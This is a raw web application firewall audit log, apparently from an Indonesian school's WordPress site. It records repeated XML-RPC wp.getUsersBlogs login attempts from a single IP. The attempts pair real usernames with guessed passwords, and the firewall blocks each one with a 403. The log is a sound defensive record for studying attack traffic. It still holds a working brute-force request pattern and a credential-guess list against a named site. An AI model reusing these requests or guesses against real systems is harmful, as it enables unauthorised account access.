Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7026c674-Z-- --e65f5762-A-- [14/Jun/2025:08:33:02 +0700] aEzRTmmwZ6YUkjOdtI7CrQAAABY 103.236.140.4 60508 103.236.140.4 8181 --e65f5762-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e65f5762-C-- wp.getUsersBlogs wakahumas marketing2020_ --e65f5762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e65f5762-E-- --e65f5762-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864782839493 5452 (- - -) Stopwatch2: 1749864782839493 5452; combined=3893, p1=464, p2=3242, p3=0, p4=0, p5=109, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e65f5762-Z-- --840a2b20-A-- [14/Jun/2025:08:34:03 +0700] aEzRi0MWfhkd5Y0sFtrp3wAAAIE 103.236.140.4 60682 103.236.140.4 8181 --840a2b20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --840a2b20-C-- wp.getUsersBlogs wakahumas smkn22-jkt-sch-id@ --840a2b20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --840a2b20-E-- --840a2b20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864843482584 5334 (- - -) Stopwatch2: 1749864843482584 5334; combined=3801, p1=469, p2=3158, p3=0, p4=0, p5=103, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --840a2b20-Z-- --c6a65668-A-- [14/Jun/2025:08:35:19 +0700] aEzR113g_boun6Rx5jLQNAAAAMw 103.236.140.4 60850 103.236.140.4 8181 --c6a65668-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6a65668-C-- wp.getUsersBlogs wakahumas admin@888 --c6a65668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6a65668-E-- --c6a65668-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864919232099 5233 (- - -) Stopwatch2: 1749864919232099 5233; combined=3797, p1=457, p2=3161, p3=0, p4=0, p5=105, sr=83, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6a65668-Z-- --36dad025-A-- [14/Jun/2025:08:36:19 +0700] aEzSE2IDXuKmWNi2UBS0ZQAAAEA 103.236.140.4 32828 103.236.140.4 8181 --36dad025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --36dad025-C-- wp.getUsersBlogs wakahumas nobody --36dad025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36dad025-E-- --36dad025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (100+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864979273368 4715 (- - -) Stopwatch2: 1749864979273368 4715; combined=3358, p1=395, p2=2807, p3=0, p4=0, p5=92, sr=88, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36dad025-Z-- --37fad776-A-- [14/Jun/2025:08:37:19 +0700] aEzST2mwZ6YUkjOdtI7C0AAAAA4 103.236.140.4 32984 103.236.140.4 8181 --37fad776-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --37fad776-C-- wp.getUsersBlogs wakahumas secret --37fad776-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37fad776-E-- --37fad776-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (76+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865039201431 4816 (- - -) Stopwatch2: 1749865039201431 4816; combined=3548, p1=397, p2=2964, p3=0, p4=0, p5=108, sr=81, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37fad776-Z-- --d36e8367-A-- [14/Jun/2025:08:38:30 +0700] aEzSlkMWfhkd5Y0sFtrqGQAAAIo 103.236.140.4 33032 103.236.140.4 8181 --d36e8367-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d36e8367-C-- wp.getUsersBlogs wakahumas 123000 --d36e8367-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d36e8367-E-- --d36e8367-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865110477214 31763 (- - -) Stopwatch2: 1749865110477214 31763; combined=56575, p1=467, p2=3045, p3=0, p4=0, p5=26546, sr=98, sw=71, l=0, gc=26446 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d36e8367-Z-- --f95d1270-A-- [14/Jun/2025:08:38:40 +0700] aEzSoEMWfhkd5Y0sFtrqLQAAAIc 103.236.140.4 33072 103.236.140.4 8181 --f95d1270-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f95d1270-C-- wp.getUsersBlogs wakahumas 1234%^&* --f95d1270-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f95d1270-E-- --f95d1270-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865120267734 4324 (- - -) Stopwatch2: 1749865120267734 4324; combined=3350, p1=347, p2=2837, p3=0, p4=0, p5=98, sr=77, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f95d1270-Z-- --57458808-A-- [14/Jun/2025:08:39:30 +0700] aEzS0mmwZ6YUkjOdtI7C1gAAABU 103.236.140.4 33160 103.236.140.4 8181 --57458808-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --57458808-C-- wp.getUsersBlogs wakahumas 123456a --57458808-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57458808-E-- --57458808-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865170033803 4202 (- - -) Stopwatch2: 1749865170033803 4202; combined=3267, p1=347, p2=2740, p3=0, p4=0, p5=103, sr=78, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57458808-Z-- --f73db228-A-- [14/Jun/2025:08:40:31 +0700] aEzTD2mwZ6YUkjOdtI7DDgAAAAQ 103.236.140.4 33272 103.236.140.4 8181 --f73db228-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --f73db228-C-- wp.getUsersBlogs wakahumas butterfly --f73db228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f73db228-E-- --f73db228-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865231251645 5403 (- - -) Stopwatch2: 1749865231251645 5403; combined=3801, p1=464, p2=3147, p3=0, p4=0, p5=110, sr=85, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f73db228-Z-- --44575025-A-- [14/Jun/2025:08:41:31 +0700] aEzTS2mwZ6YUkjOdtI7DHAAAABg 103.236.140.4 33310 103.236.140.4 8181 --44575025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --44575025-C-- wp.getUsersBlogs wakahumas robert --44575025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44575025-E-- --44575025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865291545375 4307 (- - -) Stopwatch2: 1749865291545375 4307; combined=3299, p1=353, p2=2703, p3=0, p4=0, p5=172, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44575025-Z-- --479a255a-A-- [14/Jun/2025:08:42:34 +0700] aEzTimIDXuKmWNi2UBS0pgAAAFg 103.236.140.4 33430 103.236.140.4 8181 --479a255a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --479a255a-C-- wp.getUsersBlogs wakahumas myheritage --479a255a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --479a255a-E-- --479a255a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (46+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865354451454 5705 (- - -) Stopwatch2: 1749865354451454 5705; combined=4027, p1=482, p2=3375, p3=0, p4=0, p5=99, sr=83, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --479a255a-Z-- --5fed386a-A-- [14/Jun/2025:08:43:34 +0700] aEzTxkMWfhkd5Y0sFtrqUAAAAJY 103.236.140.4 33558 103.236.140.4 8181 --5fed386a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5fed386a-C-- wp.getUsersBlogs wakahumas jesus1 --5fed386a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fed386a-E-- --5fed386a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865414125269 6290 (- - -) Stopwatch2: 1749865414125269 6290; combined=4294, p1=543, p2=3519, p3=0, p4=0, p5=133, sr=102, sw=99, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fed386a-Z-- --397b8e43-A-- [14/Jun/2025:08:44:42 +0700] aEzUCmmwZ6YUkjOdtI7DPAAAAAc 103.236.140.4 33702 103.236.140.4 8181 --397b8e43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --397b8e43-C-- wp.getUsersBlogs wakahumas scooby --397b8e43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --397b8e43-E-- --397b8e43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865482883925 5280 (- - -) Stopwatch2: 1749865482883925 5280; combined=3751, p1=477, p2=3101, p3=0, p4=0, p5=101, sr=110, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --397b8e43-Z-- --9c8ee842-A-- [14/Jun/2025:08:45:47 +0700] aEzUS13g_boun6Rx5jLQyQAAAMk 103.236.140.4 33768 103.236.140.4 8181 --9c8ee842-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9c8ee842-C-- wp.getUsersBlogs wakahumas casper --9c8ee842-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c8ee842-E-- --9c8ee842-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865547031308 6226 (- - -) Stopwatch2: 1749865547031308 6226; combined=4220, p1=522, p2=3511, p3=0, p4=0, p5=110, sr=93, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c8ee842-Z-- --53a79113-A-- [14/Jun/2025:08:46:47 +0700] aEzUh0MWfhkd5Y0sFtrqgAAAAJY 103.236.140.4 33956 103.236.140.4 8181 --53a79113-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --53a79113-C-- wp.getUsersBlogs wakasarpras 63a9f0ea7 --53a79113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a79113-E-- --53a79113-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749865607138727 4392 (- - -) Stopwatch2: 1749865607138727 4392; combined=3352, p1=367, p2=2815, p3=0, p4=0, p5=99, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a79113-Z-- --414ec625-A-- [14/Jun/2025:08:47:49 +0700] aEzUxWmwZ6YUkjOdtI7DZQAAAAE 103.236.140.4 34064 103.236.140.4 8181 --414ec625-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 233 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --414ec625-C-- wp.getUsersBlogs wakasarpras wakasarpras@2018 --414ec625-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --414ec625-E-- --414ec625-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file 